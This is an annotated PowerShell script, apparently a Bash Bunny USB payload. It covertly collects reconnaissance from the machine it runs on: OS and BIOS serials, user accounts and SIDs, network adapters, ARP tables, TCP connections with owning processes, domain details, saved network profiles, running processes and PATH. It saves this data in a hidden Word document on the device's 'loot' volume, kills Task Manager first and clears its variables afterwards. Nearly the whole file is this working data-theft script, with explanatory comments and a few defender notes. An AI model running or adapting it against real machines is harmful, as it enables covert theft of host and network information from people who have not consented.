Function New-WordTable {
    <#
    .SYNOPSIS
    Inserts a Word table at $WordObject.Range and fills it from the properties
    of $Object: either one row per element with a bold header row of property
    names (-AsTable, the default parameter set) or a two-column name/value
    list with one row per property (-AsList).
    .PARAMETER WordObject
    The Word COM object whose .Range anchors the table and whose .Tables
    collection it is added to. The callers in this script pass the
    application's Selection.
    .PARAMETER Object
    The data to render. Property names are read from the first element only;
    the data rows then index every element by those same names.
    .PARAMETER Columns
    Number of columns to create. Not derived from $Object; the caller supplies
    a value matching the property count (-AsTable) or 2 (-AsList).
    .PARAMETER Rows
    Number of rows to create. For -AsTable this includes the header row.
    .PARAMETER AsTable
    Selects the 'Table' layout (header row + one data row per element).
    .PARAMETER AsList
    Selects the 'List' layout (property name in column 1, value in column 2).
    .PARAMETER TableStyle
    Only tested for presence: when it is bound, the default style assignment
    in the chosen branch is skipped. The value itself is never applied.
    .PARAMETER TableBehavior
    Word table-behavior enum passed straight through to Tables.Add.
    .PARAMETER AutoFitBehavior
    Word auto-fit enum passed straight through to Tables.Add.
    #>
    [cmdletbinding(
        DefaultParameterSetName='Table'
    )]
    Param (
        [parameter()]
        [object]$WordObject,
        [parameter()]
        [object]$Object,
        [parameter()]
        [int]$Columns,
        [parameter()]
        [int]$Rows,
        [parameter(ParameterSetName='Table')]
        [switch]$AsTable,
        [parameter(ParameterSetName='List')]
        [switch]$AsList,
        [parameter()]
        [string]$TableStyle,
        [parameter()]
        [Microsoft.Office.Interop.Word.WdDefaultTableBehavior]$TableBehavior = 'wdWord9TableBehavior',
        [parameter()]
        [Microsoft.Office.Interop.Word.WdAutoFitBehavior]$AutoFitBehavior = 'wdAutoFitContent'
    )
    #Specifying 0 index ensures we get accurate data from a single object
    $Properties = $Object[0].psobject.properties.name
    # Computed but not referenced again in this function; the table below is
    # anchored on $WordObject.Range instead.
    $Range = @($WordObject.Paragraphs)[-1].Range
    # Create the empty grid first; the branches below only write into cells.
    $Table = $WordObject.Tables.add(
        $WordObject.Range,$Rows,$Columns,$TableBehavior, $AutoFitBehavior)

    Switch ($PSCmdlet.ParameterSetName) {
        'Table' {
            # Default style only when the caller did not pass -TableStyle.
            If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
                #$Table.Style = "Medium Shading 1 - Accent 1"
                $Table.Style = "Grid Table 4 - Accent 1"
            }
            # $c / $r are the 1-based column and row cursors for Table.cell().
            $c = 1
            $r = 1
            #Build header
            # Row 1: one bold cell per property name.
            $Properties | ForEach {
                Write-Verbose "Adding $($_)"
                $Table.cell(($r),($c)).range.Bold=1
                $Table.cell($r,$c).range.text = $_
                $c++
            }
            $c = 1
            #Add Data
            # Element $i lands in row $i+2 (row 1 is the header); every value is
            # forced to [string] before it is written to the cell.
            For ($i=0; $i -lt (($Object | Measure-Object).Count); $i++) {
                $Properties | ForEach {
                    $Table.cell(($i+2),$c).range.Bold=0
                    $Table.cell(($i+2),$c).range.text = [string]$Object[$i].$_
                    $c++
                }
                $c = 1
            }
        }
        'List' {
            If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
                $Table.Style = "Light Shading - Accent 1"
            }
            $c = 1
            $r = 1
            # One row per property: bold name in column 1, value in column 2.
            # The value is read off $Object directly (not $Object[0]) and is
            # not cast to string, unlike the Table branch.
            $Properties | ForEach {
                $Table.cell($r,$c).range.Bold=1
                $Table.cell($r,$c).range.text = $_
                $c++
                $Table.cell($r,$c).range.Bold=0
                $Table.cell($r,$c).range.text = $Object.$_
                # Back to column 1, down one row.
                $c--
                $r++
            }
        }
    }
}

Function val2addr($val){
    <#
    .SYNOPSIS
    Renders a sequence of byte values as colon-separated lower-case hex
    (e.g. 00:1e:ff), the usual MAC address notation.
    .PARAMETER val
    The values to format. Each element is rendered with the 'x2' format
    specifier; a null or empty input yields an empty string.
    #>
    # Two hex digits plus a trailing space per element; a null/empty $val
    # produces no elements at all.
    $hexParts = foreach ($octet in $val) { "{0:x2} " -f $octet }
    # Concatenate without a separator, drop the trailing blank, and turn the
    # remaining single spaces into colons.
    $joined = -join $hexParts
    $joined.Trim().Replace(' ', ':')
}

# ---------------------------------------------------------------------------
# Report body. From here on the script drives a Word instance over COM and
# appends headings and tables to a single in-memory document; the file is
# written to disk only in the save step near the end of the script.
# ---------------------------------------------------------------------------

# Terminates Task Manager by process name before anything else happens.
# Stop-Process raises a non-terminating error when no such process exists,
# so execution continues either way.
Stop-Process -Name "Taskmgr"

# A Word.Application created over COM is not visible unless .Visible is set;
# that line is left commented out, so Word runs without a window.
$Word = New-Object -ComObject Word.Application
#$Word.Visible = $True
$Document = $Word.Documents.Add()
# All text and tables below are typed through the application's Selection.
$Selection = $Word.Selection
$Selection.Style = 'Title'
$Selection.TypeText("PC Info Report")
$Selection.TypeParagraph()
$Selection.Style = 'Heading 1'
$Selection.TypeText("Details")

# Host, user and timestamp header. $selection and $Selection are the same
# variable (PowerShell variable names are case-insensitive).
$Selection.TypeParagraph()
$selection.TypeText("Hostname: $($env:COMPUTERNAME)")
$Selection.TypeParagraph()
$selection.TypeText("User: $($env:USERNAME)")
$selection.TypeParagraph()
# NOTE: 'hh' is the 12-hour hour and the format has no AM/PM designator, so
# the recorded time is ambiguous across the day when a report is read back.
$selection.TypeText("Date: $(Get-Date -Format "dddd dd MMMM yyyy hh:mm:ss")")
$selection.TypeParagraph()

#OS Info
# Win32_OperatingSystem reduced to five fields. Wrapped in @() so $OS is
# always an array, since New-WordTable reads property names from $Object[0].
$OS = @(Get-CimInstance -ClassName Win32_OperatingSystem | ForEach {
    [pscustomobject] @{
        Name = $_.Caption
        Version = $_.Version
        BuildNumber = $_.BuildNumber
        Architecture = $_.OSArchitecture
        SerialNumber = $_.SerialNumber
    }
})
$Selection.Style = 'Heading 2'
$Selection.TypeText("OS")
# Two-column name/value list; -Rows 5 matches the five properties above.
New-WordTable -WordObject $Selection -Object $OS -Columns 2 -Rows 5 -AsList
# Move the selection past the table so the next section is appended after
# it. The same line follows every table in this script.
$Word.Selection.Start= $Document.Content.End

#BIOS Info
# Win32_Bios through the legacy WMI cmdlet (the OS section uses CIM); again
# wrapped in @() so $BIOS is an array.
$BIOS = @(Get-WmiObject Win32_Bios | ForEach {
    [pscustomobject] @{
        Manufacturer = $_.Manufacturer
        Name = $_.Name
        Version = $_.Version
        SerialNumber = $_.SerialNumber
        BIOSVersion = $_.SMBIOSBIOSVersion
    }
})
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("BIOS")
$Selection.TypeParagraph()
# Name/value list; the row count is taken from the PSObject properties of
# $BIOS rather than written out as a literal like the OS section does.
New-WordTable -WordObject $Selection -Object $BIOS -Columns 2 -Rows ($BIOS.PSObject.Properties | Measure-Object).Count -AsList
$Word.Selection.Start= $Document.Content.End

#HDD Info
# Win32_Volume.DriveType code -> label. The keys are integer literals, which
# is why the lookup below casts the WMI value to [int] first.
$DriveType = @{
    0x0 = 'Unknown'
    0x1 = 'No Root Directory'
    0x2 = 'Removable Disk'
    0x3 = 'Local Disk'
    0x4 = 'Network Drive'
    0x5 = 'Compact Disk'
    0x6 = 'RAM Disk'
}
# One record per volume, sorted by mount name. Sizes are rendered in GB with
# two decimals (1GB is PowerShell's byte multiplier suffix).
$Volume = @(Get-WmiObject Win32_Volume | Sort-Object -Property Name | ForEach {
    [pscustomobject]@{
        Drive = $_.Name
        DriveType = $DriveType[[int]$_.DriveType]
        Label = $_.label
        FileSystem = $_.FileSystem
        'FreeSpace(GB)' = '{0:N2}' -f ($_.FreeSpace /1GB)
        'Capacity(GB)' = '{0:N2}' -f ($_.Capacity/1GB)
    }
})

$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Drives")
$Selection.TypeParagraph()
# Six columns for the six properties above; one header row plus one row per
# volume. The dash in front of AsTable on this line is an en dash (U+2013)
# as published; PowerShell accepts dash look-alikes as the parameter dash,
# but it is easy to miss when the line is copied elsewhere.
New-WordTable -WordObject $Selection -Object $Volume -Columns 6 -Rows ($Volume.Count+1) –AsTable
$Word.Selection.Start= $Document.Content.End

# Autostart entries as reported by Win32_StartupCommand, four columns.
# Unlike $OS/$BIOS this is not @()-wrapped.
$SU = (Get-CimInstance -ClassName Win32_StartupCommand | Select-Object -Property Name, User, Command, Location)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Start Up")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $SU -Columns 4 -Rows ($SU.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End

# Accounts as enumerated by Win32_UserAccount, including each account's SID;
# five columns.
$UA =Get-WmiObject -Class Win32_UserAccount | Select-Object Caption, Domain, Name, FullName, SID
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("User Accounts")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $UA -Columns 5 -Rows ($UA.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End

# --- Networking section ----------------------------------------------------
$Selection.Style = 'Heading 1'
$Selection.TypeText("Networking")

# Only adapters with IP enabled (WQL filter); description, MAC, IP address
# list and default gateway list. IPAddress/DefaultIPGateway are array-valued
# on the CIM class and are written to the cell through New-WordTable's
# [string] cast.
$NAC = (Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object -Property Description, MACAddress, IPAddress, DefaultIPGateway)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Network Adapters")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $NAC -Columns 4 -Rows ($NAC.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End


# Neighbor cache (Get-NetNeighbor) with Unreachable entries filtered out;
# five columns.
$NW = (Get-NetNeighbor | Where-Object State -NE Unreachable | Select-Object -Property InterfaceAlias,IPAddress, LinkLayerAddress, State, Store)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Network")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $NW -Columns 5 -Rows ($NW.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End

# Arp Info
# Runs the external arp.exe and splits each output line on whitespace into
# the four positional properties named here (ConvertFrom-String default
# delimiting). Presumably arp's interface/header lines are parsed the same
# way and end up as rows too; not verified here.
$ARP = (arp -a | ConvertFrom-String -PropertyNames ('Type', 'Internet', 'Address', 'Physical'))
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("ARP")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $ARP -Columns 4 -Rows ($ARP.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End


# Process snapshot, reused twice: joined to TCP connections here and rendered
# as its own table in the Software section further down.
$process = Get-Process | Select-Object -Property Id, Name, Company, ProductVersion, Path

# Get Listeners / ActiveTcpConnections
# Every TCP connection/listener with local and remote endpoints folded into
# "address:port" strings.
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
# Second pass attaches the owning process name. The match uses -like on two
# [int] values, which compares them as strings with no wildcard, i.e. an
# equality test on the PID; $process is re-scanned for every connection.
# When no process matches, ProcessName is empty.
$listener = $listener | foreach-object {
    $listenerItem = $_
    $processItem = ($process | where { [int]$_.Id -like [int]$listenerItem.OwningProcess })
    new-object PSObject -property @{
        "LocalAddress" = $listenerItem.LocalAddress
        "RemoteAddress" = $listenerItem.RemoteAddress
        "State" = $listenerItem.State
        "AppliedSetting" = $listenerItem.AppliedSetting
        "OwningProcess" = $listenerItem.OwningProcess
        "ProcessName" = $processItem.Name
    }
} | select-Object LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress

$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Listeners / ActiveTcpConnections")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $listener -Columns 6 -Rows ($listener.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End

# Domain membership details from Win32_NTDomain, rendered as a name/value
# list; the row count comes from the PSObject properties of $ND.
$ND = (Get-CimInstance -ClassName Win32_NTDomain | Select-Object -Property ClientSiteName, DcSiteName, Description, DnsForestName, DomainControllerAddress, DomainControllerName, DomainName, Roles, Status)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("NT Domain")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $ND -Columns 2 -Rows ($ND.PSObject.Properties | Measure-Object).Count -AsList
$Word.Selection.Start= $Document.Content.End

# Known network profiles from the registry. The script changes the session's
# current location to the HKLM NetworkList signatures key, enumerates its
# subkeys, and restores the previous location afterwards.
$location = $PWD
cd 'hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged'
# For each subkey: read the Description and DefaultGatewayMac values, format
# the MAC with val2addr, and emit a two-property object. $name/$mac are set in
# the first ForEach and consumed in the second; that works because the
# pipeline streams one subkey at a time.
$Mac = gci | % { $name=$_.GetValue('Description'); $mac=val2addr($_.GetValue('DefaultGatewayMac')); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;MAC_ADDRESS=$mac }}
cd $location
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Reg Access Points")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $Mac -Columns 2 -Rows ($Mac.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End


# --- Software section ------------------------------------------------------
$Selection.Style = 'Heading 1'
$Selection.TypeText("Software")
$Selection.TypeParagraph()

# Renders the $process snapshot taken in the networking section.
$Selection.Style = 'Heading 2'
$Selection.TypeText("Current running process")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $process -Columns 5 -Rows ($process.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End

# Disabled section (block comment as published): would have listed the
# executables backing each process via CIM_ProcessExecutable. Left as-is;
# $PE is only referenced here and in the final Remove-Variable.
<#$PE = Get-WmiObject -Namespace root\cimv2 -Class CIM_ProcessExecutable | %{try{[wmi]($_.Antecedent)}catch {$null}} | Select FileName,Extension,Manufacturer,Version -ErrorAction SilentlyContinue
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("CIM Process Executables")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $PE -Columns 4 -Rows ($PE.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End#>


# --- Environment section ---------------------------------------------------
$Selection.Style = 'Heading 1'
$Selection.TypeText("Environment Variables")
$Selection.TypeParagraph()
# PATH split on ';' with a newline appended to each entry; the resulting
# array is handed to TypeText as one argument.
$envPath = $env:Path -split ";" | %{"{0}`n" -f $_}
$Selection.Style = 'Normal'
$Selection.TypeText("Path:")
$Selection.TypeParagraph()
$Selection.TypeText($envPath)
$Selection.TypeParagraph()

# --- Save and shut down Word -----------------------------------------------
# Output location: the volume whose label is 'BashBunny' (WMI query), plus
# "loot\Report_<hostname>.docx". Win32_Volume.Name is presumably the mount
# path with a trailing backslash, which is why no separator is inserted
# before "loot". From a defender's side, the observable artifacts of this
# script are a hidden Word process created over COM from the script host,
# this WMI lookup of a removable volume by label, and the .docx written
# there.
$Report = ((gwmi win32_volume -f 'label=''BashBunny''').Name + "loot\Report_$env:COMPUTERNAME.docx");
$Document.SaveAs([ref]$Report,[ref]$SaveFormat::wdFormatDocument)
$Word.Quit()
# Release the COM reference explicitly so the Word process can exit.
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$Word)

# --- Completion signal and cleanup -----------------------------------------
# Toggles Scroll Lock four times, one second apart, through WScript.Shell
# SendKeys. Presumably this is the keyboard-LED signal the Bash Bunny watches
# for to learn the payload has finished; the consumer is not in this listing.
$o = New-Object -com wscript.shell;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');

# Release the shell COM object and force finalizers to run so no COM
# references linger in the session.
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$o)
[gc]::Collect()
[gc]::WaitForPendingFinalizers()

# Drop every variable the script created. Names that were never assigned in
# this run (e.g. PE, whose section is commented out) are tolerated by
# -ErrorAction SilentlyContinue.
Remove-Variable -Name Word, OS, BIOS, DriveType, Volume, SU,
UA,NAC,NW,ARP, process, listener,listenerItem, processItem,
ND, envPath, PE, Mac, location, o -ErrorAction SilentlyContinue -Force